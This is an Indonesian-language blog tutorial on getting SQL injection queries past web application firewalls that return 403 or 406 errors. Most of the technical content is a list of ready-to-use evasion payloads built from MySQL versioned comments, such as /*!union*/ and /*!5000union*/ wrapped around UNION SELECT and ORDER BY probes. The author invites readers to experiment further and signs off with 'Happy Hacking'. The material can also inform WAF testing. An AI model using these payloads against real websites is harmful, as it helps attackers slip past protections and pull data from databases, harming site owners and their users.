skip to main | skip to sidebar

Mem-Bypass WAF SQLi ( Not Acceptable )

Kali ini saya akan membahas sebuah cara untuk membypass WAF SQLi. WAF bekerja ketika kita mencoba untuk meng-injeksi query SQL dan website memunculkan halaman "403 Forbidden" atau "406 Not Acceptable". WAF adalah Web Application FireWall. WAF akan mengecek setiap inputan yang dilakukan oleh pengguna. Di tutorial ini saya akan membahasnya secara singkat.


Tampilan error 403 dan 406 seperti berikut, tetapi nama websitenya saya ganti ( sensor ) karena saya tidak ingin menunjukan kerentanan website atau aplikasi yang belum di patch.



Caranya cukup gampang kalian tinggal tambahkan query menjadi /*!query*/. Saya tunjukan sebagian contohnya, untuk yang lain bisa kalian coba-coba sendiri.

and -- /*!and*/
1=1 -- /*!1=1*/
union -- /*!union*/
select 1,2,3.. -- /*!select 1,2,3,4,5...*/ atau /*!select*/ 1,2,3,4,5...
order by 1 -- /*!order by 1*/

Jika cara diatas tidak bisa kalian dapat tambahkan angka setelah tanda seru "!".

union -- /*!5000union*/
and -- /*!123and*/
union select 1,2,3... -- /*!12union*/ /*!34select*/ 1,2,3,...

Untuk tehnik bypass WAF yang lain dan lebih banyak kalian dapat mengunjungi halaman ini SQLi Bypassing WAF. Oke itu saja untuk tutorial kali ini semoga bermanfaat dan Happy Hacking. Sampai jumpa pada tutorial berikutnya.

0 komentar:

Post a Comment